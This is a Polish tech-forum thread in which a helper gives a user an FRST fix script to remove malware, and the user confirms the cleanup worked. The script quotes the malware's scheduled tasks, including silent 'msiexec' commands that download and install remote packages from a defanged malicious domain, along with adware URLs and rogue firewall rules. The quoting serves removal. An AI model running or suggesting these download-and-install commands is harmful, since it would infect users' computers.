Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

Proszę bardzo o pomoc z WIRUSEM

#1
Proszę bardzo o pomoc z WIRUSEM
Cześć wszystkim, mam taki problem że posiadam jakiegoś wirusa, nie można wejść w żaden program typu adwcleaner oraz frst i pokazują sie jakieś dziwne reklamy itp. w menedzer zadan są jakieś dwa procesy puste bez nazwy, niżej dodaje logi zrobione w trybie awaryjnym


Załączone pliki
.txt   FRST.txt (Rozmiar: 66,14 KB / Pobrań: 18)
.txt   Addition.txt (Rozmiar: 42,12 KB / Pobrań: 27)
 System operacyjny: windows_ten Przeglądarka: chrome
#2
RE: Proszę bardzo o pomoc z WIRUSEM
Log FRST.txt nie jest cały.

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Kod:
Task: {4F00C31C-C8C3-4291-82D9-D9135FF977F2} - System32\Tasks\{D6459D03-F9D4-330B-6DC3-0B5A77FC5E2D} => "msiexec" /q /i hxxps://siyxmoner.com/kcjdzvwhrynf.pyt
Task: {87EB9FEE-0113-4860-AD5E-7FB8BC8FAD0E} - System32\Tasks\{1F0D4441-810C-750B-2075-53DF96115FAE} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://skoonympe.net/cl/?guid=77d6ahxtdzyedl5yqqenmxi2kz499oc6&prid=1&pid=4_1400_49
Task: {AB2A2B74-C646-4E59-B5AE-F9B7524E6B06} - System32\Tasks\{BC45EF28-9F0F-B238-886D-5B1B34A225D2} => "msiexec.exe" /q /i hxxps://siyxmoner.com/lduesfj4rno0.yua
Task: {F27B4423-E4D7-4944-92AD-5E075A52F226} - System32\Tasks\{87BB7C58-CC87-189D-C930-C46792185D73} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://skoonympe.net/cl/?guid=9xdzz2dctivufjf8oxydxdpkltlgdbkc&prid=1&pid=4_1400_49
C:\Users\szymo\AppData\Local\imw.ini
C:\Users\szymo\AppData\Roaming\AOOQiGM.exe
C:\Program Files (x86)\Common Files\UooYpOFoCEDU.exe
FirewallRules: [{BE543D80-99BE-44E1-9C35-6563541C3D9D}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{A319368B-8C43-4E66-9ABA-3A4454BD360B}] => (Allow) C:\Users\szymo\AppData\Roaming\AOOQiGM.exe
FirewallRules: [{A70A13DB-735A-4F8F-AFE9-730791750899}] => (Allow) C:\Program Files (x86)\Common Files\UooYpOFoCEDU.exe
FirewallRules: [{2D837731-F922-41A3-A590-4615CAA81CBD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{897CE2F9-B45B-44DC-993A-25A640CD3E16}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{1F9C7A98-DB2D-4540-A6A9-509343B8B305}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{58FD96FD-1F26-4B35-B798-B07FB9B2917D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AE7CFE61-0B4F-4024-B0D0-0BCF889BD324}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7EAE5665-B8C8-4C0F-9E9C-FFFA0CE8BA2B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{CEFFBB43-9610-4DD6-842D-A769AE5B9B77}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{3360254A-C4B7-4DC0-A50E-D751BBABED01}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{78C3E77F-398A-403E-B891-2C582CCA6ACE}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{14AFE83F-BF67-4073-84C7-E1BE558C0E90}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{557C1C8F-4B36-4D0A-8A16-32C0D1B0EA01}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{AE81246F-05A7-4C71-AAEF-F8E3FC977E2A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{53E775CD-9866-4B2C-9C13-5CC1E3EB671D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{DCD96FAB-73FE-4CCF-B98C-3820CE7D0BF1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{77C3E34B-90C5-484E-AAF2-4884A200867F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{BC046FF9-E8E7-46AB-BC27-4F5ACBBC3CC7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{EFC73E8A-D5AD-45BC-8810-58C743F80A40}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{AEE029EA-7D8B-48BD-8B00-9C23ADF0743A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{84716E4A-1652-4E65-A431-631BEE86AAC1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{DBBBB5D3-BA72-421E-9E12-5E02EA67FB46}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{97C6352E-5A80-4766-849F-79804915C9C7}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{45368894-3BA3-441E-ADD8-70D41F7EB1E3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{41F116BE-05B9-4B6A-9E26-447A5A60B371}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{003C5F90-1447-43E1-90C2-8BF8D23D4841}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{56C7D4DC-AEDA-4D32-A9A2-C3289447324F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{3C0C5C27-8750-4752-B095-F5C8702A8042}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{08152F02-6216-40AC-8B97-A165A26CC94D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{3A9FEDEE-5890-44D7-B8B3-689765EFA8BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0E91D9E8-191F-4F8B-AFF7-88475E4E25C9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{617DE588-15D3-4BA4-90C1-BE2940CF14F3}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{CEBA50EA-ACB9-461B-B388-DF18F941F1F6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AB0D9F19-D319-41ED-9619-44047F8A9E59}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{4199F35E-0DA0-4E45-8BF6-DFF730B223EF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{BFBD566C-D422-4583-8D8C-6A273BFC2ECA}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{338B90B4-942D-421D-BC23-D48E0525C48F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{E096BA18-37C5-40BD-A2D2-C9BFAC8F5BC1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{CF34FE78-CDF5-4FB9-833E-A937657AC6E2}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{FE37AF51-3AC5-4613-A20F-B31FF1A76BAD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{87CF89D2-6383-4443-A0F3-02F9AA07D8AE}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{150A2FC2-7252-46F4-9F83-473306CCA214}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{FCC17A8E-FC48-4F6C-A3A7-8020B24B7ADF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{32266F04-2239-4975-8DCB-166EFF46BCA9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{FC9C263C-0BB9-4D5F-92A0-7806263A740A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{3581E19E-253B-483F-B8AD-591046A4BE38}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{463F3722-2E9A-43F0-96AB-300CBE7DD76A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{1CD19C91-5558-4D27-84B2-062B37E6B35B}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{28ADB39E-10EF-4131-8111-AE9430F3AF2A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{F4FB8E4C-12AA-4FA3-A6DD-217F6B63681E}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{205613B9-A6A3-40A6-8D4D-9489D41CDB1A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
Task: {75679D0C-9F31-4E27-815E-BCB99161709C} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA
SearchScopes: HKU\S-1-5-21-2355776432-2705484396-3863938602-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Jeśli problem nie zniknie, to zrobisz nowe logi FRST.
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#3
RE: Proszę bardzo o pomoc z WIRUSEM
zrobiłem wszystko co kazałeś dorzucam logi wydaje się że jest ok ale możesz jeszcze zerknąć z góry wielkie dzieki za pomoc !!!


Załączone pliki
.txt   FRST.txt (Rozmiar: 63,88 KB / Pobrań: 6)
.txt   Addition.txt (Rozmiar: 35,38 KB / Pobrań: 8)
.txt   Shortcut.txt (Rozmiar: 54,37 KB / Pobrań: 12)
 System operacyjny: windows_ten Przeglądarka: chrome
#4
RE: Proszę bardzo o pomoc z WIRUSEM
Jest OK.
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
Programy: Polecane / Nowe / Inne




Podobne wątki (Proszę bardzo o pomoc z WIRUSEM)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  pup.optional.legacy - bardzo proszę o pomoc... palmyto 18 3372 25.07.2019, 17:19
Ostatni post: Illidan
  Po starcie systemu włącza się strona z wirusem maciek11991 4 6887 12.03.2019, 20:23
Ostatni post: morderca
  przy odpaleniu windowsa włacza sie strona z wirusem :( Wojt84 1 4305 15.12.2018, 05:25
Ostatni post: Illidan

Skocz do:


Wybrane wątki (Proszę bardzo o pomoc z WIRUSEM)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Złośliwy załącznik w mailu - makra tictac 1 4623 14.02.2018 19:14
Ostatni post: broda99
  Informacja o zablokowaniu komputera MMilka 2 4585 08.02.2018 21:27
Ostatni post: MMilka
  Ile antywirusów? greg8403 2 4733 06.02.2018 16:38
Ostatni post: Michu_PL
  Czy programy do hakowania facebooka działają? Majki_77 2 6200 06.02.2018 16:35
Ostatni post: Michu_PL
  Łamanie hasła wifi Globart 2 4539 06.02.2018 16:33
Ostatni post: Michu_PL
  Chrome przekierowuje na Yahoo wool14 0 4430 31.01.2018 00:00
Ostatni post: wool14
  System nie wyłącza się po kliknięciu "zamknij" niceassshe 3 4878 28.01.2018 20:56
Ostatni post: broda99
  Proces bez nazwy zużywa dużo pamięci Xayliii 1 5040 28.01.2018 08:13
Ostatni post: broda99
  Problem z komputerem/ping od dziś soba7 1 4538 26.01.2018 16:50
Ostatni post: Michu_PL
  windows 10 nie otwiera plików exe lewus23 2 5890 22.01.2018 00:52
Ostatni post: broda99
  Wirus na facebooku wysyla wiadomosci Pawes97 1 4499 19.01.2018 18:51
Ostatni post: kamel16
  Samoczynne zapychanie się partycji systemowej Nedved942 4 4647 18.01.2018 16:02
Ostatni post: ~Anonim
  COM Surrogate (dllhost) Egzoo 8 5269 14.01.2018 17:31
Ostatni post: Egzoo
  Co jakiś czas włącza mi się 1 i ta sama strona. geeseene 6 4632 13.01.2018 21:33
Ostatni post: broda99
  12kotov.ru uruchamia się przy starcie kompa talares 3 993 10.01.2018 12:35
Ostatni post: morderca